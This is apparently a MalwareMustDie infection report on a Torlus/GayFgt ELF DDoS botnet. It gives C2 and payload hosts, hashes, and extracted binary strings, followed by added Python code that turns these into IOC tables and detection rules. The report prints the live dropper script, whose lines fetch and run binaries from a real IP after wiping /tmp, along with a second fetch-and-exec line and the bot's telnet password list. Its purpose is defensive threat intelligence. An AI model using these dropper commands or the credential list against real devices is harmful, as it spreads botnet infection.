MalwareMustDie

Malware ELF DDOS Botnet Torlus/GayFgt Infection Report

Feb 27th, 2016
   _____         .__                                  _____                  __ _______  .__
  /     \ _____  |  |__  _  _______ _______   ____   /     \  __ __  _______/  |\____ \ |__| ____
 /  \ /  \\__  \ |  |\ \/ \/ /\__  \\_  __ \_/ __ \ /  \ /  \|  |  \/  ___/\   __\  |  \|  |/ __ \
/    Y    \/ __ \|  |_\     /  / __ \|  | \/\  ___//    Y    \  |  /\___ \  |  | |  `   \  \  ___/
\____|__  (____  /____/\/\_/  (____  /__|    \___  >____|__  /____//____  > |__|/__ __  /__|\___  >
        \/     \/                  \/            \/        \/           \/             \/        \/
#MalwareMustDie :: malwaremustdie.org

###############################
# 0x01. Cyber crime Suspect
###############################

  Handle: AntiChrist/Reverse/NoHacker/etc.. | Origin: Noord Netherlands
  Verdict: Hacks routers to plant ELF malware backdoors for DDoS attacks and other malicious purposes;
           a Lizard Squad loonie, and administrator of the Lizard Stresser service.
           PoC: https://pastebin.com/raw/nweQVfN6
  Profile:
  http://malwaremustdie.org/stat/antichrist.html

###############################
# 0x02. Report details
###############################

   New malware infrastructure in Moldova & Lithuania
   Malware variant: ELF Botnet Torlus/GayFgt/Lizard Kebab multi architecture.
   Malware / incident reference: MMD-0052-2016 - SkidDDOS ELF infection
   http://blog.malwaremustdie.org/2016/02/mmd-0052-2016-skidddos-elf-distribution.html

#### ELF INFECTION #######

// infection:
http://new.updatebits.su/get.sh (185.130.5.179)
// updates1:
http://new.updatebits.su/cfw.sh (185.130.5.179)
// updates2 (tftp, tft.sh):
cf.updatebits.su (208.67.1.66)

//CNC:
176.123.7.70:168
hostname: 176-123-7-70.alexhost.md (176.123.7.70)
Connection to 176.123.7.70 168 port [tcp/] succeeded!

// domain:
domain:        UPDATEBITS.SU
nserver:       amy.ns.cloudflare.com.
nserver:       art.ns.cloudflare.com.
state:         REGISTERED, DELEGATED
person:        Private Person
e-mail:        zefknot@gmx.com
registrar:     R01-REG-FID
created:       2015.11.28
paid-till:     2016.11.28
free-date:     2016.12.31
source:        TCI

#### PAYLOAD SERVER #######

HTTP/1.1 200 OK
Date: Sat, 27 Feb 2016 13:28:25 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Fri, 26 Feb 2016 22:13:32 GMT
ETag: "14202b6-703-52cb39c0a08f2"
200 OK

#### LOCATION ######

{
  "ip": "185.130.5.179",
  "hostname": "new.updatebits.su",
  "city": "",
  "region": "",
  "country": "LT",
  "loc": "56.0000,24.0000",
  "org": "AS60117 Host Sailor Ltd."
}
{
  "ip": "176.123.7.70",
  "hostname": "176-123-7-70.alexhost.md",
  "city": "Chisinau",
  "region": "Municipiul Chisinau",
  "country": "MD",
  "loc": "47.0056,28.8575",
  "org": "AS200019 ALEXHOST SRL"
}
{
  "ip": "208.67.1.66",
  "hostname": "cf.updatebits.su",
  "city": "Kansas City",
  "region": "Missouri",
  "country": "US",
  "loc": "39.1472,-94.5735",
  "org": "AS33387 DataShack, LC",
  "postal": "64116"
}

#### PAYLOADS #######

-------------------
// get.sh as served: each line fetches one architecture's build, writes it over a file named busybox,
// marks it executable and runs it; builds for the wrong CPU fail to exec, only the matching one runs.
ulimit -n 712
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d11 || wget http://185.130.5.179/d11;cat d11 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d8 || wget http://185.130.5.179/d8;cat d8 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d7 || wget http://185.130.5.179/d7;cat d7 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d1 || wget http://185.130.5.179/d1;cat d1 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d2 || wget http://185.130.5.179/d2;cat d2 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d3 || wget http://185.130.5.179/d3;cat d3 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d4 || wget http://185.130.5.179/d4;cat d4 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d5 || wget http://185.130.5.179/d5;cat d5 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d6 || wget http://185.130.5.179/d6;cat d6 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d9 || wget http://185.130.5.179/d9;cat d9 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d10 || wget http://185.130.5.179/d10;cat d10 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d12 || wget http://185.130.5.179/d12;cat d12 >busybox;chmod 777 busybox;./busybox
rm -rf /tmp/1
rm -rf /var/run/

#### BINS #######

--------------------
d1:  ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
d10: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
d11: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
d12: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
d2:  ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
d3:  ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
d4:  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
d5:  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
d6:  ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, not stripped
d7:  ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
d8:  ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
d9:  ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped

#### HASHES #######

--------------------
SHA1 (d1) = 7d23b5292db6f928da4e357194d83466ef177a31
SHA1 (d10) = 09e1fecc42b9d95a5b72209b8c44656aac15133e
SHA1 (d11) = 691f1848297cf2b79d8e7936fb57915243ff30a5
SHA1 (d12) = b09c71710132975ebc3d5ece042664f99f270238
SHA1 (d2) = 26eedb2f6d7a0794b4ed264f8185439421892c0a
SHA1 (d3) = 2b1511cd39a5f5540608713a617fe0496e8cbc18
SHA1 (d4) = 577ac74c5e28d73ab5738b1d039d2be6d9fab649
SHA1 (d5) = e6cbd349bed899005824f63e7232b70111c73b63
SHA1 (d6) = 047db9b9ea6e69511f7353e263518ed8c18a6168
SHA1 (d7) = 506b499efcd2436e7863de7ce6e6aa1f62537a71
SHA1 (d8) = 2c6863d79808801623bfd3bcce216c023004397d
SHA1 (d9) = 4249e6fd28ee2838759f1621f4c1bd79a4b1dec2

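Added example (not part of the original MalwareMustDie paste): the PAYLOADS, BINS and HASHES sections above are three separate listings that an analyst has to join by hand. The Python below parses a dropper script of this shape, pulls the primary/fallback wget URLs and the "cat dN >busybox; chmod 777; ./busybox" staging tail from each line, and joins them with `file` and SHA1 output into one record per dropped binary. The sample input is copied from this report (the first four fetch lines of get.sh and the matching `file` and SHA1 entries); the regexes, the DroppedBinary record and the function names are this example's own, not MMD tooling.

```python
"""Join a Torlus/GayFgt-style dropper script with `file` and SHA1 output into
one IOC record per dropped binary (added example; names and regexes are mine)."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Sample input copied from the report: first four fetch lines of get.sh,
# plus the matching `file` and SHA1 lines for those four binaries.
DROPPER = """ulimit -n 712
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d11 || wget http://185.130.5.179/d11;cat d11 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d8 || wget http://185.130.5.179/d8;cat d8 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d7 || wget http://185.130.5.179/d7;cat d7 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d1 || wget http://185.130.5.179/d1;cat d1 >busybox;chmod 777 busybox;./busybox
rm -rf /tmp/1
rm -rf /var/run/
"""

FILE_OUTPUT = """d1: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
d11:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
d7: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
d8: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
"""

SHA1_OUTPUT = """SHA1 (d1) = 7d23b5292db6f928da4e357194d83466ef177a31
SHA1 (d11) = 691f1848297cf2b79d8e7936fb57915243ff30a5
SHA1 (d7) = 506b499efcd2436e7863de7ce6e6aa1f62537a71
SHA1 (d8) = 2c6863d79808801623bfd3bcce216c023004397d
"""

# "busybox wget URL || wget URL": primary and fallback fetch of the same file
WGET_RE = re.compile(r"\bwget\s+(https?://[^\s;|]+)")
# "cat dN >busybox;chmod 777 busybox;./busybox": dropped name and the local file it overwrites
STAGE_RE = re.compile(r"cat\s+(\S+)\s*>\s*(\S+?)\s*;\s*chmod\s+777\s+\2\s*;\s*\./\2")
FILE_RE = re.compile(r"^(\w+):\s*(ELF .*)$", re.M)
SHA1_RE = re.compile(r"^SHA1 \((\w+)\) = ([0-9a-f]{40})$", re.M)


@dataclass(frozen=True)
class DroppedBinary:
    name: str        # file name on the payload server (d1 .. d12)
    urls: tuple      # distinct URLs the dropper fetches it from
    staged_as: str   # local name it is written over before exec
    file_type: str   # `file` description, "" if absent from the listing
    sha1: str        # "" if absent from the listing

    @property
    def arch(self) -> str:
        # second comma field of `file` output: "ARM", "x86-64", "MIPS", "PowerPC or cisco 4500" ...
        return self.file_type.split(",")[1].strip() if "," in self.file_type else ""

    @property
    def endian(self) -> str:
        head = self.file_type.split(",")[0]
        return "big" if "MSB" in head else "little" if "LSB" in head else ""


def parse_dropper(script: str) -> list:
    """[(name, staged_as, urls)] for every fetch-and-exec line, in script order.
    Lines without both a wget and the cat/chmod/exec tail (ulimit, rm -rf) are skipped."""
    found = []
    for line in script.splitlines():
        urls = WGET_RE.findall(line)
        stage = STAGE_RE.search(line)
        if not urls or not stage:
            continue
        found.append((stage.group(1), stage.group(2), tuple(dict.fromkeys(urls))))
    return found


def build_ioc_table(script: str, file_output: str, sha1_output: str) -> dict:
    """name -> DroppedBinary, joining the dropper with the `file` and SHA1 listings."""
    types = dict(FILE_RE.findall(file_output))
    hashes = dict(SHA1_RE.findall(sha1_output))
    return {
        name: DroppedBinary(name, urls, staged_as, types.get(name, ""), hashes.get(name, ""))
        for name, staged_as, urls in parse_dropper(script)
    }


def payload_hosts(table: dict) -> set:
    """Every host a dropped binary is fetched from (block / hunt list)."""
    return {urlparse(u).hostname for b in table.values() for u in b.urls}


def wipes_working_dir(script: str) -> bool:
    """True if the dropper runs `rm -rf *` inside /tmp or /var/run before fetching:
    prior artefacts there are destroyed, so collect volatile data before rebooting."""
    return any("rm -rf *" in line and ("cd /tmp" in line or "cd /var/run" in line)
               for line in script.splitlines())


if __name__ == "__main__":
    table = build_ioc_table(DROPPER, FILE_OUTPUT, SHA1_OUTPUT)
    for b in table.values():
        print(f"{b.name:4} {b.arch:8} {b.endian:6} {b.sha1}  {b.urls[0]}")
    print("payload hosts:", sorted(payload_hosts(table)), "wipes tmp:", wipes_working_dir(DROPPER))
```

Feeding the full get.sh plus the complete BINS and HASHES listings gives all twelve records; the join is what turns a paste like this into something a blocklist or a YARA/Suricata rule set can be generated from, and the endianness column matters because the same MIPS/PowerPC sample exists in both LSB and MSB builds.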
#### SNIPS #######

--------------------
// .rodata strings; the 0x0805xxxx addresses are those of the i386 build.
.rodata:0x0805CD40  176.123.7.70:168
.rodata:0x0805CD51  root
.rodata:0x0805CD57  admin
.rodata:0x0805CD5E  user
.rodata:0x0805CD64  login
.rodata:0x0805CD6B  guest
.rodata:0x0805CD72  support
.rodata:0x0805CD7B  cisco
.rodata:0x0805CD82  toor
.rodata:0x0805CD88  changeme
.rodata:0x0805CD92  1234
.rodata:0x0805CD98  12345
.rodata:0x0805CD9F  123456
.rodata:0x0805CDA7  default
.rodata:0x0805CDB0  pass
.rodata:0x0805CDB6  password
.rodata:0x0805CDC0  vizxv
.rodata:0x0805CDC7  (null)
.rodata:0x0805CDCE  buf: %s\n
.rodata:0x0805CDD7  -c
.rodata:0x0805CDDA  sh
.rodata:0x0805CDDD  /bin/sh
.rodata:0x0805D200  /proc/cpuinfo
.rodata:0x0805D20E  BOGOMIPS
.rodata:0x0805D217  PING
.rodata:0x0805D21C  :>%$#
.rodata:0x0805D223  %d.%d.%d.%d
.rodata:0x0805D22F  %d.%d.%d.0
.rodata:0x0805D23A  ogin:
.rodata:0x0805D240  \r\n
.rodata:0x0805D243  assword:
.rodata:0x0805D24C  ncorrect
.rodata:0x0805D255  sh\r\n
.rodata:0x0805D25A  shell\r\n
.rodata:0x0805D264  cd /tmp || cd /var/run; rm -rf *; busybox wget http://new.updatebits.su/cfw.sh || wget http://new.updatebits.su/cfw.sh; sh cfw.sh; rm -rf cfw.sh; busybox tftp -r tft.sh -g cf.updatebits.su || tftp -r tft.sh -g cf.updatebits.su; sh tft.sh; rm -rf tft.sh\r\n
.rodata:0x0805D364  /bin/busybox;echo -e 'gayfgt'\r\n
.rodata:0x0805D384  ulti-call
.rodata:0x0805D38E  REPORT %s:%s:%s
.rodata:0x0805D39E  gayfgt
.rodata:0x0805D3D8  Failed opening raw socket.
.rodata:0x0805D3F4  Failed setting raw headers mode.
.rodata:0x0805D415  all
.rodata:0x0805D41B  syn
.rodata:0x0805D41F  rst
.rodata:0x0805D423  fin
.rodata:0x0805D427  ack
.rodata:0x0805D42B  psh
.rodata:0x0805D42F  Invalid flag \"%s\"
.rodata:0x0805D441  PONG!
.rodata:0x0805D447  GETLOCALIP
.rodata:0x0805D452  My IP: %s
.rodata:0x0805D45C  SCANNER
.rodata:0x0805D464  SCANNER ON | OFF
.rodata:0x0805D475  OFF
.rodata:0x0805D479  ON
.rodata:0x0805D47C  FORK
.rodata:0x0805D481  HOLD
.rodata:0x0805D486  JUNK
.rodata:0x0805D48B  UDP
.rodata:0x0805D48F  TCP
.rodata:0x0805D493  KILLATTK
.rodata:0x0805D49C  Killed %d.
.rodata:0x0805D4A7  None Killed.
.rodata:0x0805D4B4  LOLNOGTFO
.rodata:0x0805D4BE  8.8.8.8
.rodata:0x0805D4C6  /proc/net/route
.rodata:0x0805D4D6  \t00000000\t
.rodata:0x0805D4E1  [cpuset]
.rodata:0x0805D4EA  fork failed\n
.rodata:0x0805D4F9  FAILED TO CONNECT
.rodata:0x0805D50B  PONG
.rodata:0x0805D510  DUP
.rodata:0x0805D514  SH
.rodata:0x0805D517  %s 2>&1
.rodata:0x0805D523  LINK CLOSED
.rodata:0x0805D564  0.9.30
.rodata:0x0805DBC8  -c
.rodata:0x0805DBCB  /bin/sh
.rodata:0x0805DE2C  /dev/null
.rodata:0x0805DE74  clntudp_create: out of memory\n
.rodata:0x0805DEE0  bad auth_len gid %d str %d auth %d\n
.rodata:0x0805DF04  xdr_string: out of memory\n
.rodata:0x0805DF1F  xdr_bytes: out of memory\n
.rodata:0x0805DF68  (nil)
.rodata:0x0805DF6E  (null)
.rodata:0x0805DFC5  npxXoudifFeEgGaACScs
.rodata:0x0805EB90  __get_myaddress: socket
.rodata:0x0805EBA8  __get_myaddress: ioctl (get interface configuration)
.rodata:0x0805EBDD  __get_myaddress: ioctl
.rodata:0x0805EBF4  Cannot register service
.rodata:0x0805EC1C  xdr_array: out of memory\n
.rodata:0x0805EC38  /etc/resolv.conf
.rodata:0x0805EC49  /etc/config/resolv.conf
.rodata:0x0805EC61  nameserver
.rodata:0x0805EC6C  domain
.rodata:0x0805EC73  search
.rodata:0x0805EC7A  %s%s%m\n
.rodata:0x0805ED5C  RPC: (unknown error code)
.rodata:0x0805ED76  %s:
.rodata:0x0805ED7F  ; errno = %s
.rodata:0x0805ED8C  ; low version = %lu, high version = %lu
.rodata:0x0805EDB4  ; why =
.rodata:0x0805EDBD  (unknown authentication error - %d)
.rodata:0x0805EDE1  ; s1 = %lu, s2 = %lu
.rodata:0x0805F1D4  %x
.rodata:0x0805F1D7  0123456789abcdef
.rodata:0x0805F1E8  /etc/hosts
.rodata:0x0805F1F3  /etc/config/hosts

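Added example (not MalwareMustDie code): the strings above give a defender almost everything needed for detection without running the sample: the hard-coded C2 176.123.7.70:168, the command verbs the bot dispatches on (PING, GETLOCALIP, SCANNER ON|OFF, FORK, HOLD, JUNK, UDP, TCP, KILLATTK, LOLNOGTFO, DUP, SH), the TCP flag words it validates (all/syn/rst/fin/ack/psh, else "Invalid flag"), the telnet credential list it brute-forces with, the "ogin:"/"assword:"/"ncorrect" suffixes it matches prompts on, and the two things it types into a shell it gets (the "/bin/busybox;echo -e 'gayfgt'" probe, expecting "ulti-call" back from a real busybox, then the cfw.sh/tft.sh one-liner). The Python below turns those into rules and runs them over constructed session events. The event format and the sample events are invented here (RFC 5737 addresses on the victim side; only the C2 address comes from the report), and the argument layout after a C2 verb is assumed, since the strings show only the verbs and flag names.

```python
"""Detection rules derived from the GayFgt .rodata strings (C2 endpoint, C2 verbs,
telnet wordlist, busybox probe, dropper one-liner), run over constructed events.
Added example: event format, sample events and C2 argument layout are assumptions."""
from collections import Counter

C2_HOST, C2_PORT = "176.123.7.70", 168   # from .rodata:0x0805CD40

# telnet credential candidates embedded in the bot; the strings show one list and
# not how user/password pairs are formed, so each value is checked on its own
BOT_WORDLIST = frozenset({
    "root", "admin", "user", "login", "guest", "support", "cisco", "toor",
    "changeme", "1234", "12345", "123456", "default", "pass", "password", "vizxv",
})

# verbs the bot dispatches on; PONG / PONG! / "My IP: %s" are its replies, not commands
C2_VERBS = frozenset({
    "PING", "GETLOCALIP", "SCANNER", "FORK", "HOLD", "JUNK", "UDP", "TCP",
    "KILLATTK", "LOLNOGTFO", "DUP", "SH",
})
TCP_FLAGS = frozenset({"all", "syn", "rst", "fin", "ack", "psh"})

# what the scanner types into a freshly brute-forced telnet shell
BUSYBOX_PROBE = "/bin/busybox;echo -e 'gayfgt'"
DROPPER_MARKERS = ("cd /tmp || cd /var/run", "rm -rf *", "wget http://")


def parse_c2(payload: str):
    """(verb, args) if the line starts with a known C2 verb, else None."""
    parts = payload.strip().split()
    if not parts or parts[0] not in C2_VERBS:
        return None
    return parts[0], parts[1:]


def tcp_flags(args) -> list:
    """Flag words the TCP flood handler accepts; anything else hits 'Invalid flag'."""
    return [a for a in args if a.lower() in TCP_FLAGS]


def weak_telnet_credential(value: str) -> bool:
    """True if a username or password is one the bot will try."""
    return value in BOT_WORDLIST


def detect(events) -> list:
    """(rule, event) pairs. Event keys: kind ('tcp' | 'telnet_login' | 'shell'),
    src, dst, dport, and data or username/password (assumed format)."""
    alerts = []
    for e in events:
        if e.get("dst") == C2_HOST and e.get("dport") == C2_PORT:
            alerts.append(("c2_endpoint", e))
        if e["kind"] == "tcp" and parse_c2(e["data"]):
            alerts.append(("c2_command", e))
        if e["kind"] == "telnet_login" and weak_telnet_credential(e["password"]):
            alerts.append(("bot_wordlist_login", e))
        if e["kind"] == "shell" and (
            BUSYBOX_PROBE in e["data"] or all(m in e["data"] for m in DROPPER_MARKERS)
        ):
            alerts.append(("dropper_or_busybox_probe", e))
    return alerts


def summarize(events) -> dict:
    """Alert counts per rule."""
    return dict(Counter(rule for rule, _ in detect(events)))


# Constructed sample events: 192.0.2.10 is an infected host, 192.0.2.77 a scanned device.
SAMPLE_EVENTS = [
    {"kind": "tcp", "src": "192.0.2.10", "dst": C2_HOST, "dport": C2_PORT, "data": "PING"},
    {"kind": "tcp", "src": "192.0.2.10", "dst": C2_HOST, "dport": C2_PORT, "data": "GETLOCALIP"},
    {"kind": "tcp", "src": C2_HOST, "dst": "192.0.2.10", "dport": 40022,
     "data": "TCP 198.51.100.7 80 30 syn ack"},           # argument layout assumed
    {"kind": "tcp", "src": "192.0.2.10", "dst": "203.0.113.5", "dport": 443, "data": "GET / HTTP/1.1"},
    {"kind": "telnet_login", "src": "192.0.2.10", "dst": "192.0.2.77", "dport": 23,
     "username": "root", "password": "vizxv"},
    {"kind": "telnet_login", "src": "10.0.0.4", "dst": "192.0.2.77", "dport": 23,
     "username": "ops", "password": "K7#pqL9!z"},
    {"kind": "shell", "src": "192.0.2.10", "dst": "192.0.2.77", "dport": 23, "data": BUSYBOX_PROBE},
    {"kind": "shell", "src": "192.0.2.10", "dst": "192.0.2.77", "dport": 23,
     "data": "cd /tmp || cd /var/run; rm -rf *; busybox wget http://new.updatebits.su/cfw.sh "
             "|| wget http://new.updatebits.su/cfw.sh; sh cfw.sh; rm -rf cfw.sh"},
]

if __name__ == "__main__":
    for rule, e in detect(SAMPLE_EVENTS):
        print(f"{rule:26} {e['src']} -> {e['dst']}:{e['dport']}")
    print(summarize(SAMPLE_EVENTS))
```

The credential rule is the one to act on first: any router or embedded device whose telnet login or password appears in BOT_WORDLIST is in scope for this scanner regardless of vendor. The busybox probe is a cheap honeypot signature because the bot checks the reply for "ulti-call" (the busybox "multi-call binary" banner) before sending the dropper line, so a fake shell that answers the probe will receive the stage-2 URLs.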
###############################
# 0x03. Contact us for more information
###############################

Twitter: @malwaremustdie (Direct Message)
         warning: your IP/location will be scanned & conversation is recorded
         Come clean & stay safe!

#MalwareMustDie!
[EOF]